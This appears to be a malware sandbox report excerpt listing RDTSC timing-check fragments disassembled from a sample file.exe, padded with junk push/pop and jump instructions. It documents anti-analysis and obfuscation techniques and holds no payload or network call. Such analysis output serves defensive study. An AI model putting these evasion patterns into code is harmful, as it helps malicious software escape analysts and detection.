Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1199BED second address: 1199C0F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007EFF1080EDD6h 0x0000000f jmp 00007EFF1080EDE1h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1199C0F second address: 1199C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1199C15 second address: 1199C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1199C1F second address: 1199C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007EFF112B4C1Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1199D9E second address: 1199E0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE5h 0x00000007 jnp 00007EFF1080EDD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ja 00007EFF1080EDE7h 0x00000015 jmp 00007EFF1080EDE1h 0x0000001a ja 00007EFF1080EDECh 0x00000020 push edx 0x00000021 pop edx 0x00000022 jmp 00007EFF1080EDE4h 0x00000027 jmp 00007EFF1080EDE7h 0x0000002c popad 0x0000002d pushad 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119E580 second address: 119E586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119E586 second address: 119E5AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFF1080EDE8h 0x0000000d jl 00007EFF1080EDD6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A5953 second address: 11A595D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFF112B4C16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A6090 second address: 11A6096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A6096 second address: 11A609D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A609D second address: 11A60A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A6219 second address: 11A621D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A663D second address: 11A6646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A6646 second address: 11A665F instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFF112B4C23h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A665F second address: 11A6663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A6A9D second address: 11A6AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A6AA1 second address: 11A6AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B5C9 second address: 117B5CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B5CF second address: 117B5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B5D3 second address: 117B5E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jo 00007EFF112B4C1Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B6E0 second address: 117B6E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B6E4 second address: 117B6E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B9E9 second address: 117B9EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117BCDF second address: 117BCEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117BCEB second address: 117BCF0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117BE2A second address: 117BE2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117C034 second address: 117C082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 adc di, 2AAAh 0x0000000e sub dword ptr [ebp+122D1CBAh], ebx 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007EFF1080EDD8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 xor cx, 120Eh 0x00000035 sub dword ptr [ebp+122D1915h], ebx 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push esi 0x00000040 pop esi 0x00000041 jne 00007EFF1080EDD6h 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117C414 second address: 117C41A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117C521 second address: 117C527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117C527 second address: 117C52C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1159493 second address: 115949B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1137647 second address: 113764B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AD305 second address: 11AD32A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFF1080EDDFh 0x00000008 jmp 00007EFF1080EDE1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AD880 second address: 11AD884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AD884 second address: 11AD894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007EFF1080EDDAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11ADB40 second address: 11ADB53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B4FF6 second address: 11B500B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007EFF1080EDD6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B4400 second address: 11B4404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B3B56 second address: 11B3B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B3B5C second address: 11B3B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFF112B4C16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B47EC second address: 11B47F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B495F second address: 11B4970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9451 second address: 11B9455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9455 second address: 11B945B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B982F second address: 11B9837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9DE7 second address: 11B9DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFF112B4C16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BA221 second address: 11BA227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BA227 second address: 11BA231 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFF112B4C16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BA231 second address: 11BA237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BA237 second address: 11BA255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007EFF112B4C2Ah 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE135 second address: 11BE13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE13C second address: 11BE150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 js 00007EFF112B4C16h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE150 second address: 11BE15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE15C second address: 11BE16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007EFF112B4C16h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE16A second address: 11BE179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFF1080EDD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE179 second address: 11BE17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE17D second address: 11BE183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C35AA second address: 11C35AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C35AE second address: 11C35C4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFF1080EDD6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jg 00007EFF1080EDD6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C35C4 second address: 11C35C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C2E3F second address: 11C2E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C2E43 second address: 11C2E52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007EFF112B4C16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C2F90 second address: 11C2FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007EFF1080EDD6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C3245 second address: 11C3265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007EFF112B4C1Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jne 00007EFF112B4C16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C3265 second address: 11C3280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C3280 second address: 11C32AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C22h 0x00000007 pushad 0x00000008 jmp 00007EFF112B4C25h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C32AC second address: 11C32EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF1080EDE7h 0x00000009 jmp 00007EFF1080EDDBh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007EFF1080EDE6h 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CA0AB second address: 11CA0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C8AE0 second address: 11C8AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007EFF1080EDD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C8C47 second address: 11C8C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C8D78 second address: 11C8D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C8D7C second address: 11C8D8E instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFF112B4C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C8D8E second address: 11C8DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDBh 0x00000007 jmp 00007EFF1080EDE0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007EFF1080EDE5h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C90E0 second address: 11C90E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117C214 second address: 117C279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+1245C1A6h], edx 0x00000010 mov ebx, dword ptr [ebp+1248032Eh] 0x00000016 mov dword ptr [ebp+122D1D21h], edi 0x0000001c add eax, ebx 0x0000001e jmp 00007EFF1080EDDBh 0x00000023 nop 0x00000024 jmp 00007EFF1080EDDCh 0x00000029 push eax 0x0000002a jmp 00007EFF1080EDE3h 0x0000002f nop 0x00000030 xor cl, FFFFFF97h 0x00000033 push 00000004h 0x00000035 push esi 0x00000036 mov edx, edi 0x00000038 pop edx 0x00000039 nop 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d pushad 0x0000003e popad 0x0000003f pop eax 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1130BAA second address: 1130BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007EFF112B4C24h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CD7EC second address: 11CD825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007EFF1080EDE9h 0x0000000d je 00007EFF1080EDD6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007EFF1080EDDBh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D1FC4 second address: 11D1FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007EFF112B4C16h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D1FD2 second address: 11D1FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D1719 second address: 11D171F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D171F second address: 11D172E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF1080EDDBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D1887 second address: 11D1890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D1A01 second address: 11D1A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D1A07 second address: 11D1A26 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFF112B4C16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFF112B4C1Dh 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D1A26 second address: 11D1A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D1A2B second address: 11D1A36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007EFF112B4C16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DA471 second address: 11DA4A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007EFF1080EDDAh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007EFF1080EDE8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DA4A7 second address: 11DA4AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D8433 second address: 11D8439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D8439 second address: 11D8444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D8444 second address: 11D8448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D8775 second address: 11D877B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D877B second address: 11D8781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D8781 second address: 11D8785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D8D40 second address: 11D8D50 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFF1080EDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D8D50 second address: 11D8D5A instructions: 0x00000000 rdtsc 0x00000002 je 00007EFF112B4C16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D9041 second address: 11D9047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D9047 second address: 11D9060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007EFF112B4C21h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
